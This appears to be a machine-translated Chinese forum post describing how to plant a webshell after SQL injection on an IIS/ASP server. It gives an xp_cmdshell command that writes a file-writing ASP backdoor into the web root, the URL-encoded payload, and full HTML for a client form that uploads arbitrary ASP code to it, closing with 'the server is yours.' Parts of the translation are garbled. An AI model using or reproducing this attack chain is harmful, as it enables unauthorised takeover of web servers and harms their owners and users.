After SQL injection, how to upload the treasure horse, has always been a more headache, and I have another way to upload the Trojan here.
1. When SQL is injected, use XP_cmdshell to write an ASP file that can write files on the server.
document content:
<% Set objFSO = Server.createObject ( "Scripting.FileSystemObject") Set objCountFile = objFSO.createTextFile (request ( "mypath"), True) objCountFile.Write request ( "mydata") objCountFile.Close%> This file can be written in one line <% Set objFSO = Server.createObject ( "Scripting.FileSystemObject"): Set objCountFile = objFSO.createTextFile (request ( "mypath"), True): objCountFile.Write request ( "mydata"): objCountFile.Close%>
Code special characters can be obtained
% 3C% 25Set% 20objFSO% 20 =% 20Server.createObject (% 22Scripting.FileSystemObject% 22): Set% 20objCountFile = objFSO.createTextFile (request (% 22mypath% 22), True): objCountFile.Write% 20request (% 22mydata% 22): ObjcountFile.close% 25% 3E
Injection (here the Web directory is c: / inetpub / wwwroot /):
exec master..xp_cmdshell 'echo "% 3C% 25Set% 20objFSO% 20 =% 20Server.createObject (% 22Scripting.FileSystemObject% 22): Set% 20objCountFile = objFSO.createTextFile (request (% 22mypath% 22), True): objCountFile .Write% 20Request (% 22myData% 22): objcountfile.close% 25% 3e "> c: /inetpub/wwroot/ftp.asp ';
This will generate an ftp.asp file in the server's web directory.
The code of the file is
<% Set objFSO = Server.createObject ( "Scripting.FileSystemObject") Set objCountFile = objFSO.createTextFile (request ( "mypath"), True) objCountFile.Write request ( "mydata") objCountFile.Close%>
You can see that two interfaces MYPATH and MyData are reserved in the code.
MyPath is the generating path of the file next time.
MyData is the content of the file
Write a client file in the locally: RohuClient.htm code is as follows
broiler file generator - Client production: absolute zero degree QQ: 12216796 </ title> <style type = "text / css"> <! - td {font-size: 9pt; line-height: 150% } Body {font-size: 12px; font-family: Verdana, Arial, Helvetica, Sans-Serif, Song; Scrollbar-Face-Color: #eeeeeeeee; Scrollbar-Highlight-Color: #fffff; scrollbar-shadow-color: # dee3e7; SCROLLBAR-3DLIGHT-COLOR: # d1d7dc; SCROLLBAR-ARROW-COLOR: # 006699; SCROLLBAR-TRACK-COLOR: #ededed; SCROLLBAR-dARKSHADOW-COLOR: # 98aab1} A: link {FONT-SIZE: 9pt; COLOR: # 363636; line-height: 18px; Text-Decoration: none} A: visited {font-size: 9pt; color: # 363636; line-height: 18px; text-decoration: none} a: hover {color: # cc0000 Line-height: 18px; Text-Decoration: underline} Input, Select, Textarea {Font-Family: "Tahoma", "Arial", "Helvetica", "Sans-Serif", "Song"; Background-Color: # F9f9f9; font-size: 9pt; border: 1px # d2d2d2 dobble; line-height: 120%;} -> </ style> </ head> <scroll ipt language = "javascript" type = "text / javascript"> Function Chk (Theform) {if (theform.ftpurl.value == ') {alert (' Please enter the address of the submitted! '); theform.ftpurl.focus (); return false;} if (theform.mypath.value ==') {alert ('Please enter the location of the generated file!'); theform.mypath.focus (); return False;} if (theform.mydata.value == ') {alert (' Please enter the content of the generated file! '); theform.mydata.focus (); return false;} theform.action = theform.ftpurl.value } </ script> <body> <form name = "rohuform" method = "post" action =</p>
<p>"" onsubmit = "Return Chk (this)" target = "_ blank"> <table width = "673" border = "0" align = "center" cellpadding = "0" cellspacing = "0"> <tr> <TD Width = "11%"> Target location: </ td> <td width = "79%"> <input name = "ftpurl" type = "text" id = "ftpurl" size = "50"> example: http: //127.0.0.1/ftp.asp <; / td> </ tr> <tr> <td> generated file: </ td> <TD> <input name = "mypath" type = "Text" ID = "mypath "> The file path to the server will be generated. Example: c: /inetpub/wwroot/server.asp </ td> </ tr> <tr> <td value = "top"> file code: </ td> <TD> <textarea name = "mydata" cols = "100" rows = "10" id = "textarea"> </ textarea> </ td> </ TD> <TD> <input type = "submit" name = "Submit "Value =" Submit "> </ TD> </ TR> </ Table> <br> </ form> <table width =" 100% "border =" 0 "cellspacing =" 0 "cellpadding =" 0 "> <tr> <TD align = "center"> Copyright: absolute zero (<a href="http://www.rohu.com" ;> 盟 </a>) </ td> </ tr> < / Table> </ body> </ html> fills the URL address of the ftp.asp file that has just been generated in the target location bar</p>
<p>Such as</p>
<p>Http://127.0.0.1/ftp.asp (here you assume that the server's IP is 127.0.0.1)</p>
<p>Infault input, file names that will be generated on the server, such as: c: /inetpub/wwroot/server.asp</p>
<p>In the file content, paste an ASP code at will</p>
<p>Submit, when</p>
<p>Http://127.0.0.1/ftp.asp file is executed in the event of a basic server.</p>
<p>Browse</p>
<p>http://127.0.0.1/server.asp huh, the server is yours.</p>
<p>HOKY: This article did not know that in that place, there was no writer who was in that place. I didn't remember it.</p></div><div class="text-center mt-3 text-grey">
转载请注明原文地址:https://www.9cbs.com/read-38685.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>)
</div><div></div></div></div><ul class="postlist list-unstyled">
</ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="38685" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved
</div><div class="col text-right">Processed:
<b>0.031</b>, SQL:
<b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script>
var debug = DEBUG = 0;
var url_rewrite_on = 1;
var url_path = './';
var forumarr = {"1":"Tech"};
var fid = 1;
var uid = 0;
var gid = 0;
xn.options.water_image_url = 'view/img/water-small.png';
</script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script>
var forum_url = 'list-1.html';
var safe_token = 'Ylhk3HnOFiWFHKhI_2BEBOu9nsBqr7v7zxlMq8_2BcebswYos5Nl7Rru3CO1y8lLo47lBqG5wFBgNFu0Ns8q_2BTVdnw_3D_3D';
var body = $('body');
body.on('submit', '#form', function() {
var jthis = $(this);
var jsubmit = jthis.find('#submit');
jthis.reset();
jsubmit.button('loading');
var postdata = jthis.serializeObject();
$.xpost(jthis.attr('action'), postdata, function(code, message) {
if(code == 0) {
location.reload();
} else {
$.alert(message);
jsubmit.button('reset');
}
});
return false;
});
function resize_image() {
var jmessagelist = $('div.message');
var first_width = jmessagelist.width();
jmessagelist.each(function() {
var jdiv = $(this);
var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width();
var jmessage_width = Math.min(jdiv.width(), maxwidth);
jdiv.find('img, embed, iframe, video').each(function() {
var jimg = $(this);
var img_width = this.org_width;
var img_height = this.org_height;
if(!img_width) {
var img_width = jimg.attr('width');
var img_height = jimg.attr('height');
this.org_width = img_width;
this.org_height = img_height;
}
if(img_width > jmessage_width) {
if(this.tagName == 'IMG') {
jimg.width(jmessage_width);
jimg.css('height', 'auto');
jimg.css('cursor', 'pointer');
jimg.on('click', function() {
});
} else {
jimg.width(jmessage_width);
var height = (img_height / img_width) * jimg.width();
jimg.height(height);
}
}
});
});
}
function resize_table() {
$('div.message').each(function() {
var jdiv = $(this);
jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>');
});
}
$(function() {
resize_image();
resize_table();
$(window).on('resize', resize_image);
});
var jmessage = $('#message');
jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); });
jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); });
$('#nav li[data-active="fid-1"]').addClass('active');
</script>
